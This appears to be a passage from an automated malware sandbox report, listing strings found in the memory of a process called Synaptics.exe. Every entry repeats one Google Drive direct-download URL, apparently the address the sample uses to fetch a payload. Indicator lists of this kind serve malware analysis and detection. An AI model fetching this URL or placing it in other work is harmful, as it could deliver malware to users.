                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2346850361.000000001D9E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2321971186.000000000EEDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                          Source: Synaptics.exe, 00000004.00000002.2302077647.00000000071F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAV
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAp
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA~
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007367000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBO
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC:
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCC
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCZ-
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCo
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCompkN
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadConte
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCz
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007227000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDGVOH
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDene
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenet
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenet4
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenethu
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDk
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDo
                          Source: Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDrivemWn
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD~
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000072BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE$
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEF
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEs
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFD
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFl
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFp
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGL
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH.xls
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHA
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHM
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHT
                          Source: Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIGuZD
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIx
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIy
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007367000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2321971186.000000000EEDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2288511831.0000000002120000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJN
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ~
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK)
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2346850361.000000001D9E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKO
                          Source: Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKZ
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK_
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKu
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007227000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLn
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLo
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLz
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000072BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM5
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMr
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN8
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNs
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2346850361.000000001D9E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPL
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPYX
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQk
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007367000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2358747058.000000001DF48000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRO
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSCB
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSD
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSp
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSt
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007227000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT)
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTX
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTgH
